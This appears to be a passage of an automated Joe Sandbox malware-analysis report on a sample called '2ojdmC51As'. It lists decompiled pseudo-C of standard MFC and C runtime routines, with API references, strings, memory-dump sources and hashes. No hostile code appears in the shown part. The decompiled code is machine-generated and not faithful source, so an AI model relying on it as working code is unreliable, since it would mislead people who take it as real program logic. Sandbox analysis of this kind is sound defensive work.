0x00418b41
0x00418b44
0x00418b54
0x00418b5a
0x00418b46
0x00418b46
0x00418b49
0x00418b4b
0x00418b4b
0x00418b49
0x00418b44
0x00418b3f
0x00418b3a
0x00418b6c
0x00418acb
0x00418acb
0x00418ad1
0x00418ae5
0x00418ae5
0x00418ad1

APIs

__EH_prolog.LIBCMT ref: 00418A7B
lstrcpynA.KERNEL32(?,?,00000104), ref: 00418BA1

Strings

pB, xrefs: 00418ABB
HB, xrefs: 00418AEF

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prologlstrcpyn
String ID: HB$pB
API String ID: 588646068-605489205
Opcode ID: ff96da6f84b56ea17657301ddea9ad1fb8759a806265bcfd84cdef9f7fdf6d18
Instruction ID: a9f5f5579fdfe236bfe92a05d823b87aef4f8825b77d1c3b985387d1bf5da384
Opcode Fuzzy Hash: ff96da6f84b56ea17657301ddea9ad1fb8759a806265bcfd84cdef9f7fdf6d18
Instruction Fuzzy Hash: EF419D71A0421A9BCF21EF55C8819EEB3A5EF04354F11412FF866A71E0EB38AD80CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00416FCD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00416FCD(void** __ecx, char* _a4, short _a8) {
				signed int _v8;
				void** _v12;
				signed int _v16;
				short* _v20;
				short _v84;
				signed int _t47;
				signed int _t48;
				void* _t61;
				signed int* _t67;
				void* _t75;
				signed int _t81;
				short* _t84;
				signed int _t86;
				signed int _t93;
				void** _t94;
				void* _t96;

				_v12 = __ecx;
				if(__ecx[1] != 0) {
					_t67 = GlobalLock( *__ecx);
					_t47 = _t67[0];
					_v8 = 0 | _t47 == 0x0000ffff;
					if(_t47 != 0xffff) {
						_t48 =  *_t67;
					} else {
						_t48 = _t67[3];
					}
					asm("sbb esi, esi");
					_v16 = _t48 & 0x00000040;
					_t93 = ( ~_v8 & 0x00000002) + 1 << 1;
					if(_v8 == 0) {
						 *_t67 =  *_t67 | 0x00000040;
					} else {
						_t67[3] = _t67[3] | 0x00000040;
					}
					_a4 = _t93 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v84, 0x20) * 2;
					_t84 = E00416E50(_t67);
					_t75 = 0;
					_v20 = _t84;
					if(_v16 != 0) {
						_t22 = E00406A48(_t84 + _t93) * 2; // 0x3
						_t75 = _t93 + _t22 + 2;
					}
					_t26 = _t84 + 3; // 0x6
					_t55 = _t75 + _t26 & 0x000000fc;
					_v16 = _t75 + _t26 & 0x000000fc;
					_t86 = _t84 +  &(_a4[3]) & 0xfffffffc;
					if(_v8 == 0) {
						_t81 = _t67[2];
					} else {
						_t81 = _t67[4];
					}
					if(_a4 != _t75 && _t81 > 0) {
						E00405EA0(_t86, _t55, _t67 - _t55 + _v12[1]);
						_t96 = _t96 + 0xc;
					}
					 *_v20 = _a8;
					E00405EA0(_v20 + _t93,  &_v84, _a4 - _t93);
					_t94 = _v12;
					_t94[1] = _t94[1] + _t86 - _v16;
					GlobalUnlock( *_t94);
					_t94[2] = _t94[2] & 0x00000000;
					_t61 = 1;
					return _t61;
				}
				return 0;
			}

0x00416fd9
0x00416fdc
0x00416fef
0x00416ff3
0x00417002
0x00417005
0x0041700c
0x00417007
0x00417007
0x00417007
0x00417016
0x00417018
0x0041701f
0x00417024
0x0041702c
0x00417026
0x00417026
0x00417026
0x00417046
0x0041704f
0x00417051
0x00417053
0x00417059
0x00417065
0x00417065
0x00417065
0x0041706c
0x00417070
0x00417076
0x00417079
0x00417080
0x00417088
0x00417082
0x00417082
0x00417082
0x0041708f
0x004170a1
0x004170a6
0x004170a6
0x004170b6
0x004170c0
0x004170c5
0x004170d0
0x004170d3
0x004170d9
0x004170df
0x00000000
0x004170e1
0x00000000

APIs

GlobalLock.KERNEL32 ref: 00416FE9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0041703C
GlobalUnlock.KERNEL32(?), ref: 004170D3

Strings

System, xrefs: 00416FD3

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$ByteCharLockMultiUnlockWide
String ID: System
API String ID: 231414890-3470857405
Opcode ID: 1a9a31325cfa5bba34be76270e85657ed16da1fae0bf9ce6274e1f8cd34a53b2
Instruction ID: c2f8acceaa533c94d1390ef28e6fe5bddd73ae44c4aad8fbd6ca481d2bb84418
Opcode Fuzzy Hash: 1a9a31325cfa5bba34be76270e85657ed16da1fae0bf9ce6274e1f8cd34a53b2
Instruction Fuzzy Hash: 9741E872904305EFCB10DFA4C8859EF7BB5FF44354F50816AE815AB284D3399A86CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004227B5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004227B5(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
				intOrPtr _v8;
				void* __ebp;
				int _t42;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t69 = __edx;
				_push(__ecx);
				_t71 = _a4;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t71 + 0x6c)) == 0) {
					L6:
					if(( *(_t71 + 0x64) & 0x00000004) != 0) {
						_a16 = _a16 | 0x00000004;
						if((_a17 & 0x00000050) != 0) {
							_a16 = _a16 & 0x0000002f | 0x00000020;
						}
					}
					_t74 = E004225E5(_v8, _t77, _a16);
					E0041663D(_t74, 0, _a8, _a12, 0, 0, 0x15);
					if( *((intOrPtr*)(_t74 + 0x20)) == 0) {
						_t29 = _t71 + 0x1c; // 0x9630a380
						 *((intOrPtr*)(_t74 + 0x20)) =  *_t29;
					}
					E0041D196(E0041649C(_t74, 0xe81f), _t69, _t71, 0);
					 *((intOrPtr*)( *_t74 + 0xc8))(1);
					_t32 = _t71 + 0x1c; // 0x9630a380
					_t42 = GetWindowLongA( *_t32, 0xfffffff0);
					if((_t42 & 0x10000000) == 0) {
						L14:
						return _t42;
					} else {
						E0041668C(_t74, 8);
						L13:
						_t42 = UpdateWindow( *(_t74 + 0x1c));
						goto L14;
					}
				}
				_t4 = _t71 + 0x70; // 0xc8b8c35e
				_t76 =  *_t4;
				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x78)) == 0 || E0041D12E(_t76) != 1 || ( *(_t76 + 0x64) & _a16 & 0x000000f0) == 0) {
					goto L6;
				} else {
					_t74 = E00413740(_t77, GetParent( *(_t76 + 0x1c)));
					E0041663D(_t74, 0, _a8, _a12, 0, 0, 0x15);
					 *((intOrPtr*)( *_t74 + 0xc8))(1);
					goto L13;
				}
			}

0x004227b5
0x004227b8
0x004227bc
0x004227c1
0x004227c7
0x00422820
0x00422824
0x00422826
0x0042282e
0x00422839
0x00422839
0x0042282e
0x0042284b
0x00422856
0x0042285e
0x00422860
0x00422863
0x00422863
0x00422876
0x00422881
0x00422889
0x0042288c
0x00422897
0x004228ab
0x004228af
0x00422899
0x0042289d
0x004228a2
0x004228a5
0x00000000
0x004228a5
0x00422897
0x004227c9
0x004227c9
0x004227ce
0x00000000
0x004227ec
0x004227ff
0x0042280a
0x00422815
0x00000000
0x00422815

APIs

GetParent.USER32(?), ref: 004227EF

Part of subcall function 0041663D: SetWindowPos.USER32(?,?,?,?,?,?,00000000,?,00412218,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00416664

GetWindowLongA.USER32 ref: 0042288C
UpdateWindow.USER32(?), ref: 004228A5

Strings

P, xrefs: 0042282A

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$LongParentUpdate
String ID: P
API String ID: 1906497633-3110715001
Opcode ID: 4c1a669f7961fc11da61d3b93e60f0e00272df2c871d8d7a3064cd67a7cf3fe7
Instruction ID: 4478c7b2db2806f657cab283070aca1dc542ec48e340ed71b02adf3b0aace616
Opcode Fuzzy Hash: 4c1a669f7961fc11da61d3b93e60f0e00272df2c871d8d7a3064cd67a7cf3fe7
Instruction Fuzzy Hash: C631F371700614BFDB21AF25DD48BAF7BA8FF04704F40062AF9015A2A1CB79EC51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004244A1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004244A1(void* __edx) {
				signed char* _v8;
				char _v12;
				int _v16;
				void _v148;
				unsigned int _t20;
				int _t26;
				signed int _t36;
				struct HINSTANCE__* _t38;
				struct HBITMAP__* _t39;
				int _t41;
				unsigned int _t43;
				void* _t47;
				signed int* _t48;
				signed int _t53;
				signed int _t57;
				void* _t58;
				void* _t60;

				_t47 = __edx;
				_t20 = GetMenuCheckMarkDimensions();
				_t41 = _t20;
				_t43 = _t20 >> 0x10;
				_v16 = _t43;
				if(_t41 > 0x20) {
					_t41 = 0x20;
				}
				asm("cdq");
				_t57 = _t41 + 0xf >> 4;
				_t53 = (_t41 - 4 - _t47 >> 1) + (_t57 << 4) - _t41;
				if(_t53 > 0xc) {
					_t53 = 0xc;
				}
				_t26 = 0x20;
				if(_t43 > _t26) {
					_v16 = _t26;
				}
				E00406330( &_v148, 0xff, 0x80);
				_v8 = 0x42c00c;
				_t58 = _t57 + _t57;
				_v12 = 5;
				_t48 = _t60 + (_v16 + 0xfffffffa >> 1) * _t57 * 2 - 0x90;
				do {
					_v8 =  &(_v8[1]);
					_t36 =  !(( *_v8 & 0x000000ff) << _t53);
					_t48[0] = _t36;
					 *_t48 = _t36;
					_t48 = _t48 + _t58;
					_t16 =  &_v12;
					 *_t16 = _v12 - 1;
				} while ( *_t16 != 0);
				_t38 = CreateBitmap(_t41, _v16, 1, 1,  &_v148);
				 *0x439c30 = _t38;
				if(_t38 == 0) {
					_t39 = LoadBitmapA(_t38, 0x7fe3);
					 *0x439c30 = _t39;
					return _t39;
				}
				return _t38;
			}

0x004244a1
0x004244ad
0x004244b3
0x004244b9
0x004244bf
0x004244c2
0x004244c6
0x004244c6
0x004244cd
0x004244d0
0x004244de
0x004244e3
0x004244e7
0x004244e7
0x004244ea
0x004244ed
0x004244ef
0x004244ef
0x00424503
0x00424511
0x0042451d
0x0042451f
0x00424526
0x0042452d
0x00424538
0x0042453d
0x00424541
0x00424544
0x00424546
0x00424548
0x00424548
0x00424548
0x0042455c
0x00424566
0x0042456c
0x00424574
0x0042457a
0x00000000
0x0042457a
0x00424580

APIs

GetMenuCheckMarkDimensions.USER32 ref: 004244AD
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0042455C
LoadBitmapA.USER32 ref: 00424574

Strings

, xrefs: 004244BC

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: 4b58320a925bd04fdb6ec626dd6c9f65210c363c85a9f202b098ebf0bc32f52f
Instruction ID: 209a20424c1af6e272a19c9ebc2633acba681278a5e608b332d2eb8150819f76
Opcode Fuzzy Hash: 4b58320a925bd04fdb6ec626dd6c9f65210c363c85a9f202b098ebf0bc32f52f
Instruction Fuzzy Hash: 39213A72F00225AFDB20DB78DC85BAEBBB4EB80304F454167E945EB282D7749A45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E47A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040E47A(void* __ecx) {
				signed int _t22;
				signed char _t36;
				char* _t43;
				void* _t45;

				E00406520(E0042AE14, _t45);
				_t22 =  *(_t45 + 8) & 0x00000007;
				 *(__ecx + 4) = _t22;
				_t36 =  *(__ecx + 8) & _t22;
				if(_t36 != 0) {
					if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
						E004067EC(0, 0);
					}
					_t52 = _t36 & 0x00000004;
					if((_t36 & 0x00000004) == 0) {
						__eflags = _t36 & 0x00000002;
						_t43 = "ios::failbit set";
						if((_t36 & 0x00000002) == 0) {
							_t43 = "ios::eofbit set";
						}
					} else {
						_t43 = "ios::badbit set";
					}
					 *((char*)(_t45 - 0x1c)) =  *((intOrPtr*)(_t45 + 0xf));
					E00401AE0(_t45 - 0x1c, 0);
					E00401B90(_t45 - 0x1c, _t43, E00405A40(_t43));
					_push(_t45 - 0x1c);
					 *((intOrPtr*)(_t45 - 4)) = 0;
					E0040E516(_t45 - 0x38, _t52);
					 *((intOrPtr*)(_t45 - 0x38)) = 0x42f8c4;
					_t22 = E004067EC(_t45 - 0x38, 0x433890);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t22;
			}

0x0040e47f
0x0040e48b
0x0040e48e
0x0040e494
0x0040e496
0x0040e49d
0x0040e4a1
0x0040e4a1
0x0040e4a6
0x0040e4aa
0x0040e4b3
0x0040e4b6
0x0040e4bb
0x0040e4bd
0x0040e4bd
0x0040e4ac
0x0040e4ac
0x0040e4ac
0x0040e4c9
0x0040e4cc
0x0040e4dd
0x0040e4e8
0x0040e4e9
0x0040e4ec
0x0040e4fa
0x0040e501
0x0040e506
0x0040e50b
0x0040e513

APIs

__EH_prolog.LIBCMT ref: 0040E47F

Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A

Strings

ios::eofbit set, xrefs: 0040E4BD, 0040E4D1, 0040E4D9
ios::badbit set, xrefs: 0040E4AC
ios::failbit set, xrefs: 0040E4B6

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ExceptionH_prologRaise
String ID: ios::badbit set$ios::eofbit set$ios::failbit set
API String ID: 3968804221-425934345
Opcode ID: cfeb44f17044c624223737e36215371a86458169db6e3bb98e6d2c7d25448752
Instruction ID: 058c2687817cbb3025356127984514509d88e2cf1c36159cda0efedd272f4144
Opcode Fuzzy Hash: cfeb44f17044c624223737e36215371a86458169db6e3bb98e6d2c7d25448752
Instruction Fuzzy Hash: E41173B2D015196EC700EBA2D891AEEB778AF04358F44847BF41677282D77C5919CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00418BE2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418BE2(void* __eflags) {
				intOrPtr _t22;
				intOrPtr _t45;
				void* _t47;
				void* _t52;

				_t52 = __eflags;
				E00406520(E00429FAB, _t47);
				_t22 =  *0x436980; // 0x436994
				 *((intOrPtr*)(_t47 - 0x14)) = 0;
				 *((intOrPtr*)(_t47 - 0x10)) = _t22;
				_t45 = 1;
				 *((intOrPtr*)(_t47 - 4)) = _t45;
				GetFullPathNameA( *(_t47 + 0xc), 0x104, _t47 - 0x118, _t47 + 0xc);
				 *( *(_t47 + 0xc)) = 0;
				GetTempFileNameA(_t47 - 0x118, "MFC", 0, E00416CC1(_t47 - 0x10, _t47, 0x105));
				E00416D10(_t47 - 0x10, _t52, 0xffffffff);
				if( *((intOrPtr*)(_t47 + 0x10)) == 0) {
					E00417B0B( *((intOrPtr*)(_t47 - 0x10)));
				}
				E00416861( *((intOrPtr*)(_t47 + 8)), _t47 - 0x10);
				 *((intOrPtr*)(_t47 - 0x14)) = _t45;
				 *((char*)(_t47 - 4)) = 0;
				E00416AEC(_t47 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return  *((intOrPtr*)(_t47 + 8));
			}

0x00418be2
0x00418be7
0x00418bf2
0x00418bfb
0x00418bfe
0x00418c06
0x00418c17
0x00418c1a
0x00418c2b
0x00418c40
0x00418c4b
0x00418c53
0x00418c58
0x00418c58
0x00418c64
0x00418c69
0x00418c6f
0x00418c72
0x00418c7f
0x00418c87

APIs

__EH_prolog.LIBCMT ref: 00418BE7
GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00418C1A
GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 00418C40

Part of subcall function 00416D10: lstrlenA.KERNEL32(00000000,?,00416FC8,000000FF,?,00411ED7,?,?,?,0003C000,00000010,00000000,?,?), ref: 00416D23

Part of subcall function 00417B0B: DeleteFileA.KERNEL32(?), ref: 00417B0F
Part of subcall function 00417B0B: GetLastError.KERNEL32(00000000), ref: 00417B1A

Strings

MFC, xrefs: 00418C3A

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: FileName$DeleteErrorFullH_prologLastPathTemplstrlen
String ID: MFC
API String ID: 501224598-3472178984
Opcode ID: 9a9022fc194ece3b065672907c030a6f4c508a25102b56638d347160a0d79358
Instruction ID: 106d24b416a7ad35a8895af97b87cb9fb89e8d85cfd421907a0314e2615bf241
Opcode Fuzzy Hash: 9a9022fc194ece3b065672907c030a6f4c508a25102b56638d347160a0d79358
Instruction Fuzzy Hash: 90114FB1A01219EFCF00EF94DC819EEB778FF04354F01456AF925A7290DB749A44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042514B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0042514B() {
				signed short _v16;
				signed short _v20;
				char _v24;
				signed int _t6;
				intOrPtr* _t16;
				signed int _t19;

				_t6 =  *0x43687c; // 0xffffffff
				if(_t6 != 0xffffffff) {
					return _t6;
				}
				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
				_t19 = 0x40000;
				if(_t16 != 0) {
					E00406330( &_v24, 0, 0x14);
					_v24 = 0x14;
					_push( &_v24);
					if( *_t16() >= 0) {
						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x43687c = _t19;
				return _t19;
			}

0x00425151
0x00425159
0x004251b8
0x004251b8
0x00425174
0x00425176
0x0042517d
0x00425187
0x00425192
0x00425199
0x0042519e
0x004251ab
0x004251ab
0x0042519e
0x004251ad
0x00000000

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,004036DA,?,?,004036DA,?,00000800,50402834,?,?,0000E800,?), ref: 00425162
GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0042516E

Strings

DllGetVersion, xrefs: 00425168
COMCTL32.DLL, xrefs: 0042515D

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: COMCTL32.DLL$DllGetVersion
API String ID: 1646373207-1518460440
Opcode ID: 2a739991d6eb5f9aa751dae63f041506000971ef8fe04b880086a9e70bc82503
Instruction ID: 98511304bc6decc3b615f85e9ad6552c3d683fa4d8a624641396a172b3716892
Opcode Fuzzy Hash: 2a739991d6eb5f9aa751dae63f041506000971ef8fe04b880086a9e70bc82503
Instruction Fuzzy Hash: 61F04FB1F013396BE71097E9AC45BAA77A89B08754F910532EA10F3290E6B4D90487F9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A759, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041A759(struct HWND__* _a4, intOrPtr _a8) {
				char _v16;
				signed int _t13;

				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
					return 0;
				} else {
					GetClassNameA(_a4,  &_v16, 0xa);
					_t13 = lstrcmpiA( &_v16, "combobox");
					asm("sbb eax, eax");
					return  ~_t13 + 1;
				}
			}

0x0041a763
0x00000000
0x0041a77c
0x0041a785
0x0041a794
0x0041a79c
0x00000000
0x0041a79e

APIs

GetWindowLongA.USER32 ref: 0041A76A
GetClassNameA.USER32(00000000,?,0000000A), ref: 0041A785
lstrcmpiA.KERNEL32(?,combobox), ref: 0041A794

Strings

combobox, xrefs: 0041A78E

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: a59dd8cb4dc7832684d3d012d2b80f62c9ff4b7594d5d7a01661a6692601d5aa
Instruction ID: 62da548da4bc7eed7f0096d352448fc276db36428101ee4b016d1f9566c4e5fc
Opcode Fuzzy Hash: a59dd8cb4dc7832684d3d012d2b80f62c9ff4b7594d5d7a01661a6692601d5aa
Instruction Fuzzy Hash: 66E0E53164020CBFCF219F60CC49F9D37B8E700305F508222B422D50E0D774E2968B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD44, Relevance: 6.2, APIs: 4, Instructions: 170
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FD44(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t75;
				void* _t78;
				intOrPtr _t82;
				signed char _t83;
				signed char _t85;
				long _t86;
				void* _t88;
				signed char _t90;
				signed char _t91;
				signed int _t95;
				intOrPtr _t96;
				char _t98;
				signed int _t99;
				long _t101;
				long _t102;
				signed int _t103;
				intOrPtr _t106;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed char _t112;
				signed char* _t113;
				long _t115;
				void* _t119;
				signed int _t120;
				intOrPtr* _t121;
				signed int _t123;
				signed char* _t124;
				void* _t125;
				void* _t126;

				_v12 = _v12 & 0x00000000;
				_t108 = _a8;
				_t119 = _t108;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t75 = _a4;
				_t111 = _t75 >> 5;
				_t121 = 0x43b520 + _t111 * 4;
				_t123 = (_t75 & 0x0000001f) + (_t75 & 0x0000001f) * 8 << 2;
				_t78 =  *((intOrPtr*)(0x43b520 + _t111 * 4)) + _t123;
				_t112 =  *((intOrPtr*)(_t78 + 4));
				if((_t112 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t112 & 0x00000048) != 0) {
					_t106 =  *((intOrPtr*)(_t78 + 5));
					if(_t106 != 0xa) {
						_a12 = _a12 - 1;
						 *_t108 = _t106;
						_t119 = _t108 + 1;
						_v12 = 1;
						 *((char*)( *_t121 + _t123 + 5)) = 0xa;
					}
				}
				if(ReadFile( *( *_t121 + _t123), _t119, _a12,  &_v16, 0) != 0) {
					_t82 =  *_t121;
					_t120 = _v16;
					_v12 = _v12 + _t120;
					_t31 = _t123 + 4; // 0x4
					_t113 = _t82 + _t31;
					_t83 =  *((intOrPtr*)(_t82 + _t123 + 4));
					__eflags = _t83 & 0x00000080;
					if((_t83 & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t120;
					if(_t120 == 0) {
						L15:
						_t85 = _t83 & 0x000000fb;
						__eflags = _t85;
						L16:
						 *_t113 = _t85;
						_t86 = _a8;
						_a12 = _t86;
						_t115 = _v12 + _t86;
						__eflags = _t86 - _t115;
						_v12 = _t115;
						if(_t86 >= _t115) {
							L40:
							_t109 = _t108 - _a8;
							__eflags = _t109;
							_v12 = _t109;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t88 =  *_a12;
							__eflags = _t88 - 0x1a;
							if(_t88 == 0x1a) {
								break;
							}
							__eflags = _t88 - 0xd;
							if(_t88 == 0xd) {
								__eflags = _a12 - _t115 - 1;
								if(_a12 >= _t115 - 1) {
									_a12 = _a12 + 1;
									_t95 = ReadFile( *( *_t121 + _t123),  &_v5, 1,  &_v16, 0);
									__eflags = _t95;
									if(_t95 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t108 = 0xd;
											L35:
											_t108 = _t108 + 1;
											__eflags = _t108;
											L36:
											_t115 = _v12;
											__eflags = _a12 - _t115;
											if(_a12 < _t115) {
												continue;
											}
											goto L40;
										}
										_t96 =  *_t121;
										__eflags =  *(_t96 + _t123 + 4) & 0x00000048;
										if(( *(_t96 + _t123 + 4) & 0x00000048) == 0) {
											__eflags = _t108 - _a8;
											if(__eflags != 0) {
												L33:
												E0040AE93(__eflags, _a4, 0xffffffff, 1);
												_t126 = _t126 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t108 = 0xa;
											goto L35;
										}
										_t98 = _v5;
										__eflags = _t98 - 0xa;
										if(_t98 == 0xa) {
											goto L32;
										}
										 *_t108 = 0xd;
										_t108 = _t108 + 1;
										 *((char*)( *_t121 + _t123 + 5)) = _t98;
										goto L36;
									}
									_t99 = GetLastError();
									__eflags = _t99;
									if(_t99 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t101 = _a12 + 1;
								__eflags =  *_t101 - 0xa;
								if( *_t101 != 0xa) {
									 *_t108 = 0xd;
									_t108 = _t108 + 1;
									_a12 = _t101;
									goto L36;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t108 = _t88;
							_t108 = _t108 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t124 =  *_t121 + _t123 + 4;
						_t90 =  *_t124;
						__eflags = _t90 & 0x00000040;
						if((_t90 & 0x00000040) == 0) {
							_t91 = _t90 | 0x00000002;
							__eflags = _t91;
							 *_t124 = _t91;
						}
						goto L40;
					}
					__eflags =  *_t108 - 0xa;
					if( *_t108 != 0xa) {
						goto L15;
					}
